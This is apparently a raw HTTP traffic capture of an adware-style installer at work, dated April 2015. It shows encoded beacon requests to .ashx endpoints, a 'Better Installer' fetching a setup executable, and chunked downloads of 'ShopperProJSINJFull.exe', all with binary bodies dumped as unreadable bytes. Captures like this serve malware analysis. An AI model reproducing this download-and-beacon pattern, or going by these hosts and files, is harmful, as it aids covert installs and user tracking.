.P.E.d......M..E....Q...e.P......M.......E.....j.j..M..K...j.j..M.Q.M.
.K....E......E..M.d......Y..]...U..Q.M..E.P.pn.....P.M..4.....].......
..........U..Q.M.j.j..E.P.M.Q.U.R.M..a.....]..............U..Q.M..M...
....E...]...........U..Q.M..M......P.E.P.M..d...P.M........]........U.
.....M..E..H.;M.r..M......;E.s..M.......U..B. E.;E.s..M..Q. U..U..M...
... E..E..E.;E.s..M..M.... U..E..H. M.;.w..M.......U..B. E. E..E..M..Q
..U. U..U..E..H.;M.s.j..U.R.M..?....E.;E.tS.M.Q.M.......E..E.P.M..
<<< skipped >>>


GET /29141.ashx?e=043Mckb8Lnhw7iCtSAyu//3K4Um6afGylFbWIrYO79FAXdQqxJ1va3sc7hbJtTJHVR5AawbKoxq2WoUK/ytStDqVCe9eXWcZYCpHZc9ZUaG/QElqGjn9p9CUHeR8YCF3sp NWI2cIlsE8XIWrh60PYXV1rPYBwrFqy2cd4qoQDl0oePvh0n93CgN3uGHcox9 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:15 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:15 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......


GET /29141.ashx?e=A3ANzFv7fWBPNjxRBLtb47Cu3p0EgVSl/WD6e6SZIIExLHUkaU0662DlNcv2CDURj6Fy3X7tYh7DeGRS0pnnebdYnK0cLSUmH4Gg7nL31GCT2C22Pl6OkXwF8xC533Fcga zuhV9q9HGaaeypH4ODX9jkGYCiUPVGxrTqW15vZAdYLC6Fwg82dCUHeR8YCF3vY2zn59BhCiswSelSpyJQqsyuDjWX8vLsJJPlhy2jdwTqcwBDTHruXFWs3G3PXIRldmt6Vgk8tRh09P2euWs7DNOG/9VewUVSSIP/9IuWNMhRQ0/M2ql1D4hBwvKipyt13PeVkHuHVk= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:16 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:16 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..



GET /mag/ytaiesmt_smtyc_setup.exe HTTP/1.1
Range: bytes=643165-
User-Agent: Better Installer(Mozilla)
Host: d2otsfra4otprh.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 643164
Connection: keep-alive
Cache-Control: no-cache
Last-Modified: Mon, 23 Mar 2015 09:00:36 GMT
Accept-Ranges: bytes
ETag: "b8e31d44765d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 04 Apr 2015 07:21:03 GMT
Content-Range: bytes 643165-1286328/1286329
X-Cache: RefreshHit from cloudfront
Via: 1.1 52d34eb8f2bf884db60fa2b0745f46ce.cloudfront.net (CloudFront)
X-Amz-Cf-Id: cFjY1ZHsy_NQh3j15pSycbtOI4zq2PZboLLqomob3CnUahf6CQCPgw==
...E.oDW...*/[email protected].....;.ht..^......
@..........F._o.[.Ru.....mT.............d.u .K.6M.,....../.p./z.8A.;.2
-...p0W6^F.....V.oP...U...qV...y...W................Z...h..T...y.....M
..*M........?O$..}s.......r...7..D.uBDE#.nqJ....!,......".M..#... ..oR
ox.tY%....`...D6f.c...)s...JOF\....r..2......kF 7\...p/../q.H..1`.A..a
.N......K..0.j...n... ...R-..F.mB...jq.ED..J.S...........u.@.:5p>..
..}n^B..*'...x...B......&..K......q....U%[.=H../.IR..y...<.=.......
.J.=Y^....%.......*....H...'W..)Vy..q..o. -.k..*.l(...>.Lys.=..?#..
A...E....Ht....4.h/......i........^.q..LI..y.....X..f........Gpu.....p
.5(...5..W.*Z......M..)......?.....;N.>5u.bC..,..kDa...n....Cu.....
6......K...../......m...6...OgF. D....m.:...a}$..s.....K.H0(`..g.....y
.....R..>.u9...[\.>.h.........g....i_....;..U.#.$9....V.T.>.H
e..L.=...8......\.-y..2~..~.'c............xT....=E..e...b._...>.'.z
...&rs.}.....3?.....n.T....".fu...b.(..tI2Z.../.8s.c.6..........9.GH\.
.\C.P%_>..V.)....(..F..,.alW...,.`.S:.Is\._...>......L.yHr..Vx.?
...xb.yF..'...'6.h..g...y q.....~.j....76N..{...;C..i,..o\.../x.0.]..e
'.n.K.b.`....dHV....f....I....3..'..!]..0.CxJ...=...V..O./.9......V...
=.Q`.F..K....q.P{.....i..9.*.*."[email protected]=..A.D...c>.....)FD/R..:...'...
..x3..T.&........C%.(.......(...( .2..v....R.>...p..gP.4...|.U..o..
...[C.U2..*g...K....H[.]...N.....Yl..XVQ.~....y.....V...N...o......?~.
.$.e..}........2.N[|..../.o...}....H^.....D.q..B#..~....[w~.}F*.f....$
..,..2.....=.s.bs :<..<=...W..#.Z.6...q..g)....'R..'.....A..
<<< skipped >>>


GET /ShopperProJSINJFull.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8jxn8tdj-su78sj1t.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:27 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: Nh6FDteAPEbksnMhlZ9mScTRUzOBd61uMuuvQykfjuZuSliFKoOwZJpNbl7usaBIw9nIe9mRqaQ=
x-amz-request-id: 44D0999A12B314B9
Last-Modified: Fri, 17 Apr 2015 05:19:45 GMT
ETag: "264d5a79c1ebf3bda62be98f2e6ff8b4"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 0-249999/4737507
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
.................................................s....................
...................................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] [email protected]...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>

GET /ShopperProJSINJFull.exe HTTP/1.1


Range: bytes=500000-749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8jxn8tdj-su78sj1t.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:27 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: Nh6FDteAPEbksnMhlZ9mScTRUzOBd61uMuuvQykfjuZuSliFKoOwZJpNbl7usaBIw9nIe9mRqaQ=
x-amz-request-id: 44D0999A12B314B9
Last-Modified: Fri, 17 Apr 2015 05:19:45 GMT
ETag: "264d5a79c1ebf3bda62be98f2e6ff8b4"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 500000-749999/4737507
..UUJ_r'....w .&.w.....Q..vi.......).,......Q...*[email protected]..?.........Q
....m.....k........GZ;.a.....Yo..\..2.-..)[email protected].;z.,.Jl......Q/V.
......f....b..p.].........:.h..S(wb'.AX&..yPT..}:.(dh*........bv.S:.&.
0.c...8....~'.7...8H..Y...P..n......._#$.l. r..T25..!;.R*.......:p.4..
q.4%[email protected]{.........=.]..& ..CjZ....W.......-....h..-.o..Y-cxrFy....
.R.......F.4E. ']'2..h2N...LEf...m....s..5.m..}.?pg./.....E..-.o...]..
.*}..&.....2.>.U~.Mo.NZ`[email protected]%..>'..; )..Y.
.....%.UV_p0z...Y..c...(..Cgm.......S.K..m.....h..\.v..2Y1..\...Q.m.B.
.Z...7.B....[1...I.....a..{..4yz...&~..5..y.g.Z.....I.S.....o.88......
5.].?..n. A...z....,.X.L8P..}N.....E.f]Zp:...r....H).N>.|..H..<.
%].6='..QJW.<D......I.... T.c..w;..}y5...tRA..........F]7WR.S.,....
;......h..P.].#..........o...zO.2Cq'.....yJ......S.....'......&...#.^R
.R...]i...(..\.o#...........ZC......U.G.6.....>(..\n....2UU.!f.$..f
....W.}..By.>w..=.?J..=7.9..c.Pr.7L.vS.....<.A..dj..H..}........
t.j.g....8M.......i.%....j$..........@..^...T'....qT.Ar.I....Q..s.....
{..).W......>..$........e..B....w..]!..*.zc..)&A&#.`....Z)/...k..&g
t;.......'q=..,G......f.....r.m.v...N2..8.....*2N..;o ....m..F.5...S..
#...o..R...C.t|S.{.W...P..&|.gE...l-1..g...Z6.....#...........9...<
....)X.0..t...[}..9...).&......}Sq.......1..i...WYc.6...i..........}.s
O......4.. !..t...1...gq..h ...5*Y....O...|./....5....h..:..)..Fs..'..
.2..A.C`!..&....y...dvog_S.f.9I.O3-.1U.d*.\h.(Vr..Q.....<....Z.....
.......ZC..%..0.p^a...\M..;..KW.cg..d.x../.l......M.-.:...... ....
<<< skipped >>>

GET /ShopperProJSINJFull.exe HTTP/1.1


Range: bytes=1500000-1749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8jxn8tdj-su78sj1t.netdna-ssl.com
Connection: Keep-Alive

GET /ShopperProJSINJFull.exe HTTP/1.1
Range: bytes=2000000-2249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8jxn8tdj-su78sj1t.netdna-ssl.com
Connection: Keep-Alive

GET /ShopperProJSINJFull.exe HTTP/1.1
Range: bytes=2750000-2999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8jxn8tdj-su78sj1t.netdna-ssl.com
Connection: Keep-Alive



"..3X( ..*'..cx=...}..=.t...Q..f..K.!.k....*K.}.D..M...V. ..-@)E.r.;..
..'.gn*2!..l....x.Z&o..R.x.o.lx ...aB.#...........`.my....0O8.}..5ff..
...v..D..T.F:H...8.. &..Px...sO.........t./..h.{.......I.^zu...Ui1gJ..
W.h.:......RE.L..m....WG......Z..V.u..l....l.........-....G&...Rk...q.
.....F......'u.V.g.2..]C&Y%....\....N._q13F..i.Cb6p/.....q._..$....;..
.({.}Y.*a.5u...oR.JFhJr,"`[email protected].\M.hZ..!~..........8.x......... .
[email protected]^.....>J&....b......m.'.y.....`..{..s?Wd.....&l
t; .;..O.o<.B.G5Q.......y..6Apg.6.....G~.&...........C......%t..E?e
Z..Q.o.2.w..v[-d[....yj...".I.........X...2}....s.w.]......_..A)..rl.P
..J_..m......)u...........5$:.:..[....M......A.$....._f.>.6r.....(.
..D<5.`!...o....C...0.\.n.xcr.c.....]m..B..3.<S9...(Dg....r..(3(
..J...$`9....p.S.....S..K.&.......iX.t.2....._.T$.q.%(....;.o.8L.q...7
...}....2.Y.K..L..R..*......f...:..Q....IR..=/.w].&.[....Hz..h. .....b
.SY='@........Q.....g...P,.Rf3:i....tB.m.,._0.......@ ....0..}.6.._..K
..e.J..&uYr..Kw..P.pY.n...&..6.<0.WU..........I-W.c3.k.b.7TO..U.~..
#`.C...i.c{......E.K.t...]O.c..&...`..De...t.g%_.....6.:.].7.R...6....
=.N.m...q..............{...1....G..c.-y*..Xv.a...1........P...ZZ..P...
.t...US....,Ra....... [email protected]?.w.^A #..3r....}...
..3.x..).(.O.HPH*3r-<..U...UL....%......P.....Al.Y.Wf.bo.t.F.0.=R2g
@....d..)g....-.. _.9....3.2.L....}..A...Z.Z._9.Q'.?...P........RG..~v
'..Q............M.....r .Iw_ HxV.L.:L...-..J......]..Z.e.....ff....*R.
.I0...[..8..gU;..^)...)x..V<..0....-..MX.^...Nk..a..W>sr..l.
<<< skipped >>>

GET /ShopperProJSINJFull.exe HTTP/1.1


Range: bytes=3250000-3499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8jxn8tdj-su78sj1t.netdna-ssl.com
Connection: Keep-Alive



G.".F.{_z o.9......!.A;.}.o.,...U..D...vP..`z....)-.y......M2Qf.......
1...?.(..M..D.4.k.|..`.-..zt.@.......#..9.l.f..Kl...N*;Y..J....3.@.{&.
..\..5{v..U...=..J<G@.%^.zom.]...6.N........3..=`..t^.F.&i.I.:..2..
... .<..;...d..k....3..#....;...B.iZV....:qt.Jg..<....F...3....q
.O.};T.po...zT.c........s..Q!I...N.}g....*.2.6<p.t.y1.....L..Dr~[..
H..t.{....)`..Õ&5..5~....(/_../.....5MSN\O6.h.....S...._.XM...V~..-(
..k.......7:.-..E....*...e.U.`..81...M..5...K..k^`.......E...\1..P....
R$...i#b..q..]...z.Q..J~?.e.Fmi.....[...R..4..&.rjAS.K....)....i..&.9%
E..7......\.....;..d....O..0,@.[......~-W&....`.C?... ). ].hdN5.b.0.[.
..{.....,.W......f..5-...$mN$.. .eH.. [email protected]...
.......3.o..c.....0.3%.56.&.L..w..CT%.....6..=...,e....F..l...Suj.[@u.
/{..X.....Q.........|==1k1....}.R#Z.2.............3S...\."...`/f......
\q=.V._"=.iP.R..p..{..Ao.....'.^/..........,.sH...I..}w..:P].r..(.....
o.6m..f.tB8".......c=Jx......NR.....-....&W..5..0*r.?.._.#...EB..^.6fD
M./....!FxY..l.G^.ta.X.<.2.hP...>uu..5fTkm4.C."..!=.kL._'... ^X4
...k........S..|.E.7..KL.....K.}3.<b..6g.#......r.d....<>..!m
e..b...).'.e;/3..qST....b.....ft...D..`....5y...5...,[email protected]|. ].
....o.^1I......$iZ...........1.(.._..v...........s....d..;.|...[.*.i..
L8..........).J.....j.-$..PT8W..GL....I.y0mj..@..................<.
P....(.f.....K...D.......e ^...R.>._....kd6............/..M...D..G.
fP'F.L..\....-@.*....;.._Z..W-.d..z.E.x....%..6... .]V..;.<}.d=2.B.
z...2p......6....9...)...!|.M.O}....Ki....x.............N....g4...
<<< skipped >>>

GET /ShopperProJSINJFull.exe HTTP/1.1


Range: bytes=4250000-4499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8jxn8tdj-su78sj1t.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:28 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: Nh6FDteAPEbksnMhlZ9mScTRUzOBd61uMuuvQykfjuZuSliFKoOwZJpNbl7usaBIw9nIe9mRqaQ=
x-amz-request-id: 44D0999A12B314B9
Last-Modified: Fri, 17 Apr 2015 05:19:45 GMT
ETag: "264d5a79c1ebf3bda62be98f2e6ff8b4"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4250000-4499999/4737507
........R.`........*..P.hu.D....V......3...f.4..........OYex......X%)J
.....K.P".......... ..vT.SMP.....k...0D.......`I....N......V"....> 
.....P.....d&.B5.:=.T..V..> [email protected]..$\..~yWh....(4a...b.8.^R
}$:....g(.Yc...Z.e|.y1..w.\..U.....jNt[.>S.@.)..t.......... .a.iC?.
..G...0..e;\...{.?...........$...v.T.W.h/..G5..0.j_....N*.R.y.....^O..
d@.>.8.J..A.0;A..2...O...D.ou.....dI...c.7.p._.........bs...HA....d
[email protected]`....m&...a.Z. .z..Nd.u...,....x0...F.J.[....D.. ......
P... |.nJ...%&.-..2...*..^...._...u....{..t..0......}.2Yf...z...`....H
3.........].........kxNo......Y.K][email protected]...$.gJ|
O..,}I....y..fE..=3.. ..2.<..|.6...g.T...."v51.IX..I.....p.jQ.. JL.
...d,...|..f/.........e....@`...{p.`.p...q.G.]m$...!.....J.T._.../c..&
.L..~b.5...y..$URaz|z...NG..5d...xM"Y.}PF'=.E....g..:.....u.!$.U<..
...?.."a.5Df..._qo....oG.P.F.J{;L...^oV.Z.Y.......~~..."..C..[..iB.ij?
......v.V....$/....b.$:..&6{....{.....N..knj........0..L..........p.qi
..r.Aa...k0..u..">x.....]fR......|@.../Y.)S..Xv....~ .........V....
.P....x.7....jR*5LW.'.....!....32;.vI....7..$...q.....l.I)y..,.......y
.#,\.zs....0V...........=...|M.lFu.y...UK.ex...q...F.....C....`...._..
.$?...SK.^2..R9...{$.....q..V-./..-...2*....*......%?S.B....2i0.C...y/
...%....eS.......>s'S5R.....|P.vK .?k....d2...c........Z....$.'.s..
y..n.)..f`.vG&..[.).C..6J.....Z.XN...nN..R..h./G..Y.%.........a..^l...
./..4...aV.~.fT8.A"Y..B... N0H_.'.LJ.,e.6...TuP......g..Q...@d.._J{O..
o/....\...|a..>.....@........).S...K.y.. ......q.....S.....4.T.
<<< skipped >>>

GET /ShopperProJSINJFull.exe HTTP/1.1


Range: bytes=4500000-4737506
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8jxn8tdj-su78sj1t.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:28 GMT
Content-Type: application/octet-stream
Content-Length: 237507
Connection: keep-alive
x-amz-id-2: Nh6FDteAPEbksnMhlZ9mScTRUzOBd61uMuuvQykfjuZuSliFKoOwZJpNbl7usaBIw9nIe9mRqaQ=
x-amz-request-id: 44D0999A12B314B9
Last-Modified: Fri, 17 Apr 2015 05:19:45 GMT
ETag: "264d5a79c1ebf3bda62be98f2e6ff8b4"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4500000-4737506/4737507
.,.yr_.o.;...9..!.H.e..QaY. f].l.............5......Q.*.........U..7..
.a.....P..C......$..Im..p.B....S....8.............pI..(.u....Kl.N!..al
..*.....{..Q.......e...,p1...77...4!=.46V..^..$5?.u.^..3....i.4.......
..>.."./8.a$.?p$...A....A.g.&...b..-..%.........A`..WI..#..x.....".
.......>.....nO.j.........{S.Cvejk1.._.n..2.2......J......_.I[YV...
ll.k.s_i...RR"0..9.z....`..Sm....%....a..C3A.f.....9$.m-...{U.Y..X....
y...U.h....0...q4^I.....;.?.$3Ga.%E..4....).L/5.G.J8h...x8#f0..sD^/..@
..\.=..}..l|..L1..N..cf<{....~.... ...#.......q............$s.[.f..
...F]..........x...|.H.db...`...F.3..:..p..8S.|.....H.MH."...........i
PR...rbH...[.....[..a.......[g..../.i.>h......)Y9.....Uo...#...#./.
/...@_......f.M....`....$..:..p..S..P.V.6}..!g.....o.. *.J.~.O..Y.....
....>[email protected].[9_...Di..%...K.T.<..i.......}w
v*QV....m.DV......j.|..1Q.....yi.....}.R...WT:g.........78mE.UhZ.G...^
>g..............0p9...u.%...kro.L.......F;.';....P..B.i... ..x?....
...U{.6....ur..x..ej....s..../..n}...f"Zy?P..y4;b.J`...0........[....f
9.s........'Y.k..[..... ....u(*$.....`..Bk.^N.....<..-u.c}..{o...9.
..6qV.t.x..X.v.b...b.J.......h.....S....[|......>."[..}..B..ly).h6@
...u.%>t.........K.>.P..72B.J¯O.....5 ..kX............MU..1...
|......K[...5...[..A...M...`..-..-...|N.{.p..?....qr...f.?.m^}C_{n .7.
..o.....)...>U..0.3hs..<Y.e...g.85.......=^..*.Xo.!..S>...l..
zo.pod7.E..Q .P.....k...sg].....L..............W.......M.[wkv}...0..2L
.'.V\ ........([email protected]..!..D4..*P9k.S..q.:.N........C.Cc*$../.
<<< skipped >>>


GET /23897.ashx?e=eFCD8T/coic9XN4SPQf2Kb0oSfJOuBg0GQ4V4xrYFdGMDmRWpWBZ0CAvELRpepitjKjHf0fty0gsvrWM 2Yqs9Bw8Rdr2x14WLazpewXw1jSN3ZRr1JhaATxIUcsgQ w24gBuBZeJveENvzEMy06jHr1mKZNfZywrNszNzik7HYYan0yy1LdwNMNN2yVHejOL6tCIMfiHdwKfYKVrkrVWnbBj2Ssp4jBy/hL8rqZ RaEgBvOe8 r0j4iLYktDM5v7nxXe0AmaeN09x0h yMmOq3 e5cYLWVDvEq1XCmEIT/KGwMMc0gnpNgExseWQzn2EHlpLL4kVIWUA34Da4rs8pwDWkqZSAv0i25pRZR6JHzgVcutEhWpOrXQRmzE/i2sQiRCxg82CBKUlB7S/EMsTMOx0OlDq0ZhTTU5KUBl3bgXlhsdczfSpiH1EtZyDzNKKMNxASrgwDn7bkIpAd/AwKA674hIgU4SmGToIH l9ITqOPsxHSJawXmrqqB9Yk vVG uGW/201wXQoWr5s837YbjT59hL5SVIrBJal7EUG/thxvMPh 11xtP 5Dt uVAXFcDLfDqVwZcuANcCrE0bQlaRw3jzKcV1uZZ5Oema28ZtojFZJ2cKyTWOYHEqf5 2M/VB50wH9zL8Hq6Ocmu0jR8nfSY9YHcwn0GoGPKVvk= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:38 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:38 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..



GET /mag/ytaiesmt_smtyc_setup.exe HTTP/1.1
Range: bytes=964747-
User-Agent: Better Installer(Mozilla)
Host: d2otsfra4otprh.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 321582
Connection: keep-alive
Cache-Control: no-cache
Last-Modified: Mon, 23 Mar 2015 09:00:36 GMT
Accept-Ranges: bytes
ETag: "b8e31d44765d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 22:40:26 GMT
Content-Range: bytes 964747-1286328/1286329
X-Cache: RefreshHit from cloudfront
Via: 1.1 99c43dac805911a3599ea503f80ef8f4.cloudfront.net (CloudFront)
X-Amz-Cf-Id: gUXoxHqIfrseMrFu9_rbv7S0gxB46sjpOTcFE8poZaOcrKenMa9zqw==
......0.w.a4..$.E..k...5.=..@a/%3.%...?.u*....=.....:.J.|MXC...E.....p
~)....I.$.&......F.:O..l-.  .*..w.$...........g......[......r........a
......37....U0..q.K...c.9.8<....e....g..5.`n.3ek.0b.....">A...E.
..O.[...........:..D..D(......W)ny./q....g?z......D.)Y.J.....1J..'*...
`S.D....o.!..5rl...pk.. n..60.i.X...D.k..%.mn.6.-..)4.....t(........p.
.I..o&........j.M..%KH..([email protected]....]
(Y..............m...!>...`.Kv.#.6...L.r..S..v.].t.....wb\a].w...\..
..rZ.K....~....tD....;.....=x....j...Q...'...e#.G.D.b.....{.;..5......
.0O.Z......0aK........K.nQ...w.P7..T[...Q../2.jz(.A.Mz...K4.!k....B...
..6$...7.F.V...54.-..WU.^.!...?..s.P..%..!....K.A5_^..=.k...!q.....`z.
..5..DC..Z..3.C..g..&../.....}.."`..Vlp.K..=0n"k....aP..z....._.]5."..
..{.H..g.......X..6......q.u..7....w..)..k.wi.c....2.<~..2.p8.Q..|.
...|w...I|...D D."H....g.U&L..\.....Fa........j.W.Q......*....*e25j.m.
....&'../.[.x.' 6..k<%E.h..:h,#..9.f..;oTR..x..)y.e.!....T.I...FNv.
.........f.X]x.:.=...O{>........`V...e a..-..ffm.....k..u...cf..I..
..g..7JNW..H"@.P...9.8..k/.F.V.I..p..p8.v..a%.;^|..S."Gi.......9%.i..^
..).. ./..&.y...h.....>.} .k...U...B8../.{....._o..;...W.q...'Y..#.
7.B..[...e.[.A....R...f.h....PM..~..{X,w....t.^.hJo7.kgkj^8.....L..w..
K...d.\.....?...;..^t....Qh?.|.D.#%..C2../....HV.!.KE.H...V....2F.o...
[email protected]...~....Q.?...x.BQ..U..&.X...~.gn..,......X#he.<.2.s.p.N_.O
.B...y..4"[email protected].'G..>Y}...I..Ls~.q...'.p..{n
....K^~...!.Sx......9V.&!...t...9..n.j ..q$. .'....-.{.>....z..
<<< skipped >>>


GET /images/64x64.ico HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:39 GMT
Content-Type: image/x-icon
Content-Length: 32038
Last-Modified: Wed, 21 Aug 2013 16:47:03 GMT
Connection: keep-alive
ETag: "5214ef07-7d26"
Expires: Sun, 19 Apr 2015 00:06:39 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
............ .h...F...  .... .........00.... ..%..V...@@.... .(B...:..
(....... ..... [email protected]{.[[
[.;;;/WWW.........................................jii.....efe.233.&%%.
!  ..--.[[[I............................[\\.,**.....]]\.011........."!
!.322.jhg?........................WWWg"!!...~.[ZY.   .........&$$./--.
`^^.........................vvu;#"".zwv.^\[.*)).........*((.755.wuuU..
..........................,  .rpp.`_^.))).........-  .ECC.............
....................544.ccc.RQo...?...2.....,*1.FEE...................
..............'&R.......x.! F.43?.KIJ.WUV.OMM.a__.mll/................
....}u..%%w.=<N.CA@.*((.&$$..,,.200.?==.jhh.gcd.NNNW........111gUTT
.....trq.YWV.?<<. .#.........#!!.301.QOO.xst.a__.{zz.110/....311
.^[Z.SQV.(';...T...8...............&.;::.`[\.vrs.QON3....(''.!...** ..
.....2.--....9...........#.! ".766.ZXX.omm.lll.........443Q''&.   ..-,
.A?=.$"".............&&&.<::.URR.cbb_................]]\.433u2//.20
0..,-.%##.........0//.FFF.\YY/................................sss.[[[/
>>>;ECC9][[%jgi..............................................
......................................................................
.............................(... ...@..... ..........................
......................................................................
......................................................................
.......................................vwy.ded VVWSAAA]555]POPMhgf#YYZ
..................................................................
<<< skipped >>>

GET /images/16x16.ico HTTP/1.1


Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:39 GMT
Content-Type: image/x-icon
Content-Length: 1150
Last-Modified: Wed, 21 Aug 2013 16:47:03 GMT
Connection: keep-alive
ETag: "5214ef07-47e"
Expires: Sun, 19 Apr 2015 00:06:39 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
............ .h.......(....... ..... .....@...........................
........ppo....Mmnn.:<<.,* ., ,.EDD.}}}9........................
...._^` \[[.....Z\Z.,//. "!.........544....Y....................ttt.BA
A.755.....YYY.)**.........!. .....SRR.~}}%....................KKK.1/..
....XXW.''&.........$"".(%%.XWW.||| ....................eef. )).....\Z
[.&&'.........&$$..**.yxx.........................yxzq, *...x.cbV.''".
........ ...522....k.........................|q[-,$.hg..BA{...B...9. .
:.20:.DBB....Q........................LIeU..X.......y...H.1/D.FDM.QPS.
NLL.fdc.wwvsjii.................XV.g..p.75H.@?9.20'. *$./.,.1/..643.WU
V.lij.gee.....NNN-AA@O..|o....sqn.][N.:81.!. .........#!!. *(.GEE.uqr.
qmn.ppp.$$$. * .^[[..~z.caa.43B. .G...1............... .334.NJK.}xy.fa
b.HHI...../-,.0/2.......J.. ....@...............%. **.DBA.oll.olm.||}.
=;=.!  ........., A.A?d...&............." !.,-,.CBB.a`_....u....TTT.MM
MI@@?.-,*./-).30*.)&$.#!!.............022.MKJ.mkkw................VUU.
VTTKJII.DCC.;9:.,  .%$#.*((.=<=.YYYwged/srr........................
......................................................................
.......................................HTTP/1.1 200 OK..Server: nginx.
.Date: Sat, 18 Apr 2015 23:36:39 GMT..Content-Type: image/x-icon..Cont
ent-Length: 1150..Last-Modified: Wed, 21 Aug 2013 16:47:03 GMT..Connec
tion: keep-alive..ETag: "5214ef07-47e"..Expires: Sun, 19 Apr 2015 00:0
6:39 GMT..Cache-Control: max-age=1800..Accept-Ranges: bytes...........
... .h.......(....... ..... .....@................................
<<< skipped >>>


